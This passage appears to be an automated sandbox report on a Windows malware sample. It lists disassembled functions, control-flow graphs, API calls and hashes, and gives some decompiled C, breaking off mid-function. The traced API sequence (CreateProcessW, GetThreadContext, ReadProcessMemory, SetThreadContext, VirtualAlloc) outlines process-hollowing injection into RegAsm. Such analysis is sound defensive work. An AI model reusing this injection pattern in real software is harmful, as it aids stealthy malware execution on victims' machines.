        • Instruction Fuzzy Hash: 1A1114B6C042098FCB10CFA9C848BEEFBF4AF48314F15882AD529B7600C378A545CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 052895C8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 228 52895c8-5289608 229 528960a-528960d 228->229 230 5289610-528963b GetModuleHandleW 228->230 229->230 231 528963d-5289643 230->231 232 5289644-5289658 230->232 231->232
        APIs
        • GetModuleHandleW.KERNEL32(00000000), ref: 0528962E
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: HandleModule
        • String ID:
        • API String ID: 4139908857-0
        • Opcode ID: a6838614d8099e2a5f4f212b549def7b4adef180bb81132a7752eef3ef77bd84
        • Instruction ID: 266286fefa2b94afca845daf0a2b82817f66d47f30bec6f263d7f0c21b4d2d74
        • Opcode Fuzzy Hash: a6838614d8099e2a5f4f212b549def7b4adef180bb81132a7752eef3ef77bd84
        • Instruction Fuzzy Hash: 3311E0B5C002598FCB10CF9AC444BEEFBF4AF89214F14C41AD829B7640D378A545CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0528DA3C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 234 528da3c-528feaa SetWindowLongW 236 528feac-528feb2 234->236 237 528feb3-528fec7 234->237 236->237
        APIs
        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0528FE28,?,?,?,?), ref: 0528FE9D
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LongWindow
        • String ID:
        • API String ID: 1378638983-0
        • Opcode ID: 737ce399f674d90fc27891b280b2adf5584039ed4eb4429ef9320132e60ba098
        • Instruction ID: 7f6139a975a9de710614797fc51bde47ecc4a65f5d050c692a1c1f26266e933e
        • Opcode Fuzzy Hash: 737ce399f674d90fc27891b280b2adf5584039ed4eb4429ef9320132e60ba098
        • Instruction Fuzzy Hash: E11103B59102499FDB10DF99D584BEEFBF8EB48324F20841AE919B7341C3B4A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0528FE38 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 239 528fe38-528feaa SetWindowLongW 240 528feac-528feb2 239->240 241 528feb3-528fec7 239->241 240->241
        APIs
        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0528FE28,?,?,?,?), ref: 0528FE9D
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LongWindow
        • String ID:
        • API String ID: 1378638983-0
        • Opcode ID: b8718fb7163689ad5abf35e5f54f158a54b2fca5c377606b7fe7173cf3b2a5c6
        • Instruction ID: 2cc1ad669782c11fb1db5ae85cc3dca28c706c54ceba752469499283f5989e01
        • Opcode Fuzzy Hash: b8718fb7163689ad5abf35e5f54f158a54b2fca5c377606b7fe7173cf3b2a5c6
        • Instruction Fuzzy Hash: 251106B5800249CFDB10CF99D589BEEFBF4EB48314F24881AD955B3640C374A544CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00F5D4A0 Relevance: .1, Instructions: 75COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000003.00000002.509616179.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f5d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8e645f06323adac951954ce958b7c73a4c0e68b3ae77ae6c9e8148f8e12f7448
        • Instruction ID: 09fe0bdbcd644265792779c14b8a499cc2eaa3620440b2258b667d6c9d0e3650
        • Opcode Fuzzy Hash: 8e645f06323adac951954ce958b7c73a4c0e68b3ae77ae6c9e8148f8e12f7448
        • Instruction Fuzzy Hash: BE2106B1905240DFDB25CF14D8C0B26BB61FB98329F28C569DE054B216C336D859EBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00F6D01C Relevance: .1, Instructions: 72COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000003.00000002.509678155.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f6d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 77af7af3712ead8348e3f0c896e24769011365aecd88a4086b834aceca7b9a88
        • Instruction ID: 47a9bb846b6adfd346c709a87c59194e07c6b31aaec42f8027d0e1c5268223eb
        • Opcode Fuzzy Hash: 77af7af3712ead8348e3f0c896e24769011365aecd88a4086b834aceca7b9a88
        • Instruction Fuzzy Hash: 2121B375B08240EFDB14CF14D8C4B26BB65EB88328F24C569D9494B24AC33AD846DBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00F6D005 Relevance: .1, Instructions: 62COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000003.00000002.509678155.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f6d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 66b7894a2f1f3a16001a6845a4eaf50f8e8dff5a4c9319d6187a37b8716f9129
        • Instruction ID: c5829f5d5d8667bc86f42b1da2e786d060ea36600de519fc62dc893a06a63381
        • Opcode Fuzzy Hash: 66b7894a2f1f3a16001a6845a4eaf50f8e8dff5a4c9319d6187a37b8716f9129
        • Instruction Fuzzy Hash: B52153759093C09FCB12CF24D994B15BF71EB46314F28C5EAD8498B657C33AD80ACB62
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00F5D49B Relevance: .1, Instructions: 56COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000003.00000002.509616179.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_f5d000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction ID: 900641c66f3b925384d13cf8d725f2fa5dfed29fb4960079318e593330b38496
        • Opcode Fuzzy Hash: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction Fuzzy Hash: 2611AF76804280CFCB16CF14D9C4B16BF61FB94324F28C6A9DD054B616C33AD85ADBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        Function 00AB1000 Relevance: 32.3, APIs: 3, Strings: 15, Instructions: 845memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • GetConsoleWindow.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000080), ref: 00AB16FA
        • SetWindowPos.USER32(00000000), ref: 00AB1701
        • VirtualProtect.KERNELBASE(32342DD0,000002E2,00000040,?), ref: 00AB1EE2
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Window$ConsoleProtectVirtual
        • String ID: s=$,52$-9$0852$952$99_1$99cb$99fd$99fd$9S1Z$9obc$S=]2$gJ0xZISNT1QdY$oS2Z$M,=
        • API String ID: 2778018546-69423270
        • Opcode ID: cea02692d4d5dae1178001425dd2090182ee1401fc29c1d42fa345ab55f34d4b
        • Instruction ID: d510442d84501647f97bd337e3c1679d7287c050c6cf90f6aa591e224b8a27d5
        • Opcode Fuzzy Hash: cea02692d4d5dae1178001425dd2090182ee1401fc29c1d42fa345ab55f34d4b
        • Instruction Fuzzy Hash: 81728AB2B543598BEB60CFB9DDC978ABAB0F715300F4045B8D548EB785D7789A858F00
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB26FA Relevance: 1.5, APIs: 1, Instructions: 3COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 482 ab26fa-ab2705 SetUnhandledExceptionFilter
        C-Code - Quality: 100%
        			E00AB26FA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00AB2706); // executed
				return _t1;
			}




        0x00ab26ff
        0x00ab2705

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_00002706,00AB2097), ref: 00AB26FF
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: ca51bbea88f5ac8503704557342a54a00557fa7c84e3450247de3c4d69ce4034
        • Instruction ID: 2f28c79fa198a18b9df90005cdbd1cf7e8fb5daae5a7955380944dd4d9fdc971
        • Opcode Fuzzy Hash: ca51bbea88f5ac8503704557342a54a00557fa7c84e3450247de3c4d69ce4034
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        Function 010D1FB5 Relevance: 14.6, APIs: 9, Instructions: 1075memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 12 10d1fb5-10d2e1b call 10d4ab5 15 10d2e1d-10d2e29 call 10d4ab5 12->15 16 10d2e2b-10d2e30 12->16 15->16 20 10d2e35-10d301c call 10d0005 VirtualAlloc * 8 call 10d1f65 * 8 call 10d46c5 * 2 call 10d4ab5 15->20 18 10d3335-10d333a 16->18 45 10d302c-10d3043 call 10d46c5 20->45 46 10d301e-10d3023 call 10d4ab5 20->46 51 10d3046-10d3052 call 10d4c15 45->51 49 10d3028-10d302a 46->49 49->45 49->51 54 10d3054-10d305e call 10d4c15 call 10d1e75 51->54 55 10d3063-10d306f call 10d4c15 51->55 54->55 61 10d30cd-10d30e3 55->61 62 10d3071-10d3095 call 10d1635 55->62 66 10d30ec-10d30f8 call 10d4c15 61->66 67 10d30e5-10d30e7 61->67 62->61 68 10d3097-10d30a3 call 10d4ab5 62->68 73 10d30fa-10d312d call 10d46c5 call 10d0265 66->73 74 10d3132-10d313e call 10d4c15 66->74 67->18 68->61 75 10d30a5-10d30b1 call 10d4ab5 68->75 93 10d32c0-10d32e1 call 10d1f15 73->93 82 10d3178-10d3184 call 10d4c15 74->82 83 10d3140-10d3158 call 10d46c5 74->83 75->61 85 10d30b3-10d30c5 call 10d46c5 75->85 95 10d31be-10d31ca call 10d4c15 82->95 96 10d3186-10d31b9 call 10d46c5 call 10d0265 82->96 91 10d315d-10d3173 call 10d0265 83->91 90 10d30ca 85->90 90->61 91->93 104 10d32ec-10d32f0 93->104 105 10d31cc-10d31ff call 10d46c5 call 10d0265 95->105 106 10d3204-10d3210 call 10d4c15 95->106 96->93 108 10d3328-10d3330 ExitProcess 104->108 109 10d32f2-10d330c call 10d1985 104->109 105->93 120 10d3247-10d3253 call 10d4c15 106->120 121 10d3212-10d3245 call 10d46c5 call 10d0265 106->121 108->18 114 10d3311-10d3314 109->114 117 10d3318-10d331c 114->117 118 10d3316 114->118 122 10d331e 117->122 123 10d3326 117->123 118->108 130 10d328a-10d32bb call 10d46c5 call 10d0265 120->130 131 10d3255-10d3288 call 10d46c5 call 10d0265 120->131 121->93 122->123 123->104 130->93 131->93
        APIs
        • VirtualAlloc.KERNELBASE(00000000,00000002,00003000,00000004,E84126B8,388F3ADB), ref: 010D2E5B
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 010D2E71
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 010D2E87
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 010D2E9B
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 010D2EAF
        • VirtualAlloc.KERNELBASE(00000000,0000003C,00003000,00000004), ref: 010D2EC3
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 010D2ED7
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 010D2EED
          • Part of subcall function 010D46C5: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 010D4863
        • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6B68C4C6), ref: 010D332A
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: AllocVirtual$ExitProcess
        • String ID:
        • API String ID: 2301755047-0
        • Opcode ID: a118c34d102690ef0c4d506b9dcacaf28342d3ffce4d2a2770a5fc4f27c1cb82
        • Instruction ID: ced4b79273daafc0ab3c84676ce694e7d2b4d436aebc662bdf3ef55e1aa4e3a1
        • Opcode Fuzzy Hash: a118c34d102690ef0c4d506b9dcacaf28342d3ffce4d2a2770a5fc4f27c1cb82
        • Instruction Fuzzy Hash: B8A23220A14758D6EB20DF64DC54BDEB236EF68700F1050E9920DEB3E5E67A4F81CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 010D46C5 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 212memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 141 10d46c5-10d486d call 10d4135 call 10d4175 * 4 VirtualAlloc 153 10d486f-10d4872 141->153 154 10d4877-10d487b 141->154 155 10d4999-10d499c 153->155 156 10d487d-10d4893 call 10d49a5 154->156 157 10d4895-10d48a7 call 10d4135 call 10d49a5 154->157 165 10d48a9-10d48af 156->165 157->165 166 10d48b9-10d48f0 165->166 167 10d48b1-10d48b4 165->167 168 10d48fe-10d4908 166->168 167->155 169 10d4938-10d4996 CallWindowProcW VirtualFree 168->169 170 10d490a-10d4936 168->170 169->155 170->168
        APIs
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 010D4863
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID: CallWindowProcW$LoadLibraryW$VirtualAlloc$VirtualFree
        • API String ID: 4275171209-840194956
        • Opcode ID: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction ID: bc08e8c46c1f417394dfdf05d8c87dce487f2a22f7a02074595b31c0c0e3087f
        • Opcode Fuzzy Hash: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction Fuzzy Hash: B9A11970D083C8DAEB11CBE8C448BEDBFB2AF25704F144199D584BB382D7BA5554CB66
        Uniqueness

        Uniqueness Score: -1.00%

        Function 010D3345 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 172 10d3345-10d33f3 call 10d0005 175 10d33fa-10d3420 call 10d4405 CreateFileW 172->175 178 10d3427-10d3437 175->178 179 10d3422 175->179 184 10d343e-10d3455 VirtualAlloc 178->184 185 10d3439 178->185 180 10d3569-10d356d 179->180 182 10d356f-10d3573 180->182 183 10d35a9-10d35ac 180->183 187 10d357c-10d3580 182->187 188 10d3575-10d3578 182->188 186 10d35af-10d35b6 183->186 191 10d345c-10d3473 ReadFile 184->191 192 10d3457 184->192 185->180 193 10d35b8-10d35c3 186->193 194 10d360b-10d3620 186->194 189 10d3590-10d3594 187->189 190 10d3582-10d358c 187->190 188->187 197 10d35a4 189->197 198 10d3596-10d35a0 189->198 190->189 199 10d347a-10d34b7 VirtualAlloc 191->199 200 10d3475 191->200 192->180 201 10d35c5 193->201 202 10d35c7-10d35d3 193->202 195 10d3630-10d3638 194->195 196 10d3622-10d362d VirtualFree 194->196 196->195 197->183 198->197 203 10d34be-10d34d9 call 10d4655 199->203 204 10d34b9 199->204 200->180 201->194 205 10d35d5-10d35e5 202->205 206 10d35e7-10d35f3 202->206 212 10d34e4-10d34ee 203->212 204->180 208 10d3609 205->208 209 10d35f5-10d35fe 206->209 210 10d3600-10d3606 206->210 208->186 209->208 210->208 213 10d3521-10d3535 call 10d4465 212->213 214 10d34f0-10d351f call 10d4655 212->214 220 10d3539-10d353d 213->220 221 10d3537 213->221 214->212 222 10d353f-10d3543 FindCloseChangeNotification 220->222 223 10d3546-10d354a 220->223 221->180 222->223 224 10d354c-10d3557 VirtualFree 223->224 225 10d355a-10d3563 223->225 224->225 225->175 225->180
        APIs
        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010D3416
        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010D362D
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: CreateFileFreeVirtual
        • String ID:
        • API String ID: 204039940-0
        • Opcode ID: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction ID: 242ca8bc9f6f57fee1e207a09d5aaf3d8be905b971b0372d3796b1d4c100a775
        • Opcode Fuzzy Hash: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction Fuzzy Hash: 66A117B4E00309EBDB14CFD8C895BEEBBB5BF48304F108199E641BB284D775AA41CB55
        Uniqueness

        Uniqueness Score: -1.00%

        Function 010D1985 Relevance: 7.9, APIs: 5, Instructions: 416processthreadCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 226 10d1985-10d1a85 call 10d4635 * 3 233 10d1a9c 226->233 234 10d1a87-10d1a91 226->234 236 10d1aa3-10d1aa9 233->236 234->233 235 10d1a93-10d1a9a 234->235 235->236 237 10d1ab0-10d1ad7 CreateProcessW 236->237 239 10d1ade-10d1af8 GetThreadContext 237->239 240 10d1ad9 237->240 242 10d1aff-10d1b1a ReadProcessMemory 239->242 243 10d1afa 239->243 241 10d1e1f-10d1e23 240->241 246 10d1e6a 241->246 247 10d1e25-10d1e29 241->247 244 10d1b1c 242->244 245 10d1b21-10d1b2a 242->245 243->241 244->241 248 10d1b2c-10d1b3b 245->248 249 10d1b53-10d1b6f call 10d3ad5 245->249 250 10d1e6f-10d1e72 246->250 251 10d1e3b-10d1e3f 247->251 252 10d1e2b-10d1e37 247->252 248->249 253 10d1b3d-10d1b4c call 10d3a35 248->253 265 10d1b76-10d1b99 call 10d3c15 249->265 266 10d1b71 249->266 255 10d1e48-10d1e4c 251->255 256 10d1e41-10d1e44 251->256 252->251 253->249 268 10d1b4e 253->268 260 10d1e4e-10d1e51 255->260 261 10d1e55-10d1e59 255->261 256->255 260->261 262 10d1e5b-10d1e61 call 10d3a35 261->262 263 10d1e66-10d1e68 261->263 262->263 263->250 271 10d1b9b-10d1b9f 265->271 272 10d1be0-10d1c01 call 10d3c15 265->272 266->241 268->241 274 10d1bdb 271->274 275 10d1ba1-10d1bd2 call 10d3c15 271->275 279 10d1c08-10d1c23 call 10d4655 272->279 280 10d1c03 272->280 274->241 281 10d1bd9 275->281 282 10d1bd4 275->282 285 10d1c2e-10d1c38 279->285 280->241 281->272 282->241 286 10d1c6b-10d1c6f 285->286 287 10d1c3a-10d1c69 call 10d4655 285->287 288 10d1d5a-10d1d77 call 10d3645 286->288 289 10d1c75-10d1c85 286->289 287->285 297 10d1d7e-10d1d9d SetThreadContext 288->297 298 10d1d79 288->298 289->288 292 10d1c8b-10d1c9b 289->292 292->288 295 10d1ca1-10d1cc5 292->295 299 10d1cc8-10d1ccc 295->299 300 10d1d9f 297->300 301 10d1da1-10d1dac call 10d3975 297->301 298->241 299->288 302 10d1cd2-10d1ce7 299->302 300->241 308 10d1dae 301->308 309 10d1db0-10d1ddc call 10d46c5 301->309 304 10d1cfb-10d1cff 302->304 306 10d1d3d-10d1d55 304->306 307 10d1d01-10d1d0d 304->307 306->299 310 10d1d0f-10d1d39 307->310 311 10d1d3b 307->311 308->241 315 10d1dde-10d1de2 FindCloseChangeNotification 309->315 316 10d1de5-10d1de9 309->316 310->311 311->304 315->316 317 10d1deb-10d1dee 316->317 318 10d1df2-10d1df6 316->318 317->318 319 10d1dff-10d1e03 318->319 320 10d1df8-10d1dfb 318->320 321 10d1e05-10d1e0b call 10d3a35 319->321 322 10d1e10-10d1e19 319->322 320->319 321->322 322->237 322->241
        APIs
        • CreateProcessW.KERNELBASE(00000001,00000000), ref: 010D1AD2
        • GetThreadContext.KERNELBASE(?,00010007), ref: 010D1AF3
        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010D1B15
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: Process$ContextCreateMemoryReadThread
        • String ID:
        • API String ID: 2411489757-0
        • Opcode ID: 9cf7fa00ef4e5d423118deeadac9358b6660a85b94d1e07586abdd49760e417c
        • Instruction ID: c9c05f63df1b36cc6d8db86c8ef6ecb082d6112438f5efc11ff0664b159850f4
        • Opcode Fuzzy Hash: 9cf7fa00ef4e5d423118deeadac9358b6660a85b94d1e07586abdd49760e417c
        • Instruction Fuzzy Hash: 75022B70A00309EBEB18DFD8C985FEEB7B6FF48704F108158E655AB284DB74A941CB55
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB5D94 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 324 ab5d94-ab5da9 GetEnvironmentStringsW 325 ab5dab-ab5dcb call ab5d5d WideCharToMultiByte 324->325 326 ab5e01 324->326 325->326 332 ab5dcd-ab5dce call ab46b0 325->332 327 ab5e03-ab5e05 326->327 329 ab5e0e-ab5e16 327->329 330 ab5e07-ab5e08 FreeEnvironmentStringsW 327->330 330->329 334 ab5dd3-ab5dd8 332->334 335 ab5dda-ab5dee WideCharToMultiByte 334->335 336 ab5df6 334->336 335->336 337 ab5df0-ab5df4 335->337 338 ab5df8-ab5dff call ab4676 336->338 337->338 338->327
        C-Code - Quality: 94%
        			E00AB5D94() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00AB5D5D(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00AB46B0(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00AB4676(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}













        0x00ab5da3
        0x00ab5da9
        0x00ab5e01
        0x00ab5e01
        0x00ab5dab
        0x00ab5dac
        0x00ab5db1
        0x00ab5dba
        0x00ab5dc0
        0x00ab5dc6
        0x00ab5dcb
        0x00000000
        0x00ab5dcd
        0x00ab5dce
        0x00ab5dd3
        0x00ab5dd8
        0x00ab5df6
        0x00ab5df0
        0x00ab5df0
        0x00ab5df2
        0x00ab5df2
        0x00ab5df9
        0x00ab5dfe
        0x00ab5dcb
        0x00ab5e05
        0x00ab5e08
        0x00ab5e08
        0x00ab5e16

        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 00AB5D9D
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AB5DC0
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AB5DE6
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AB5E08
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
        • String ID:
        • API String ID: 1794362364-0
        • Opcode ID: 37e1c9ba13b137657fd6ac405a921b2d664aec0aee812ecaec851e0bac0a46fa
        • Instruction ID: e6f9634e3acde5a122f4b88e78a8398e3afc17fc57b969ab31f5f5af8657a3a6
        • Opcode Fuzzy Hash: 37e1c9ba13b137657fd6ac405a921b2d664aec0aee812ecaec851e0bac0a46fa
        • Instruction Fuzzy Hash: 10018872E01A157B672167BA6C8DEBF6E6DDEC6B607140229FD05C6213EA61CE0285F0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB6A69 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 341 ab6a69-ab6a6e 342 ab6a70-ab6a88 341->342 343 ab6a8a-ab6a8e 342->343 344 ab6a96-ab6a9f 342->344 343->344 345 ab6a90-ab6a94 343->345 346 ab6ab1 344->346 347 ab6aa1-ab6aa4 344->347 348 ab6b11-ab6b15 345->348 351 ab6ab3-ab6ac0 GetStdHandle 346->351 349 ab6aad-ab6aaf 347->349 350 ab6aa6-ab6aab 347->350 348->342 352 ab6b1b-ab6b1e 348->352 349->351 350->351 353 ab6acf 351->353 354 ab6ac2-ab6ac4 351->354 356 ab6ad1-ab6ad3 353->356 354->353 355 ab6ac6-ab6acd GetFileType 354->355 355->356 357 ab6af3-ab6b05 356->357 358 ab6ad5-ab6ae0 356->358 357->348 359 ab6b07-ab6b0a 357->359 360 ab6ae8-ab6aeb 358->360 361 ab6ae2-ab6ae6 358->361 359->348 360->348 362 ab6aed-ab6af1 360->362 361->348 362->348
        C-Code - Quality: 84%
        			E00AB6A69() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed int _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0xac3f60 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
